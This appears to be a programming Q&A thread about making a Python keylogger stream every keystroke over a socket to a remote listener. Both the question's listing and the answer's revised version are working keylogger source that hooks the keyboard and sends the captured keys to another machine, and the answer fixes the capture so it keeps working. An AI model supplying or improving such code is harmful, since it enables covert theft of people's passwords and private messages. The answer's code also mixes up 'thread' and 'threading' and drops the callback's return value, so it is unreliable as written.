# Adding socket to a keylogger

Tags: python, sockets, keylogger

For fun purposes, I'm building a keylogger. What I want is the keylogger will act like a chat client and will send every key stroke to the other party. However, when I try to do it, it only sends the first key I pressed, not the others that follow it.

```
import socket
import pythoncom
import pyHook




HOST = "192.168.2.103"
PORT = 5000

s = socket.socket()
s.connect((HOST, PORT ))


def OnKeyboardEvent(event):
  global s
  keylog = chr(event.Ascii)
  s.send(keylog.encode("utf-8"))
  return True



h_m = pyHook.HookManager()
h_m.KeyDown =OnKeyboardEvent
h_m.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: First, are you sure it's only sending the first one, or could it be that you're only doing a single `recv` on the server side?

Comment: No, I put .recv within a while loop on the server side.

Answer (score 3):

As explained in [the tutorial](https://sourceforge.net/p/pyhook/wiki/PyHook_Tutorial/#timing):

> If a callback function does not return in a timely manner, the event is automatically forwarded along the hook callback chain, and, if no other callback blocks it, onto the destination window. Therefore, as little processing as possible should be done in a callback. Instead, the callback should add events to a queue for later processing by an application and quickly decide whether or not to block the message.

Calling `socket.send` can block. It can easily block long enough for PyHook to abort your hook, or just to disable it for future calls. To fix it, do exactly what the docs say. For example (untested, but should be at least a sufficient example to get you started):

```
import queue
import socket
import thread

import pythoncom
import pyHook

q = queue.Queue()

HOST = "192.168.2.103"
PORT = 5000

def background():
    s = socket.socket()
    s.connect((HOST, PORT))
    while True:
        msg = q.get()
        s.send(msg)
sockthread = threading.Thread(target=background)
sockthread.start()

def OnKeyboardEvent(event):
    keylog = chr(event.Ascii)
    q.put(keylog.encode("utf-8"))

h_m = pyHook.HookManager()
h_m.KeyDown = OnKeyboardEvent
h_m.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: I think I understood my mistake. I put the socket.accept() within while loop, too. That's why, it's stuck on the first key stroke. Thank you anyways :)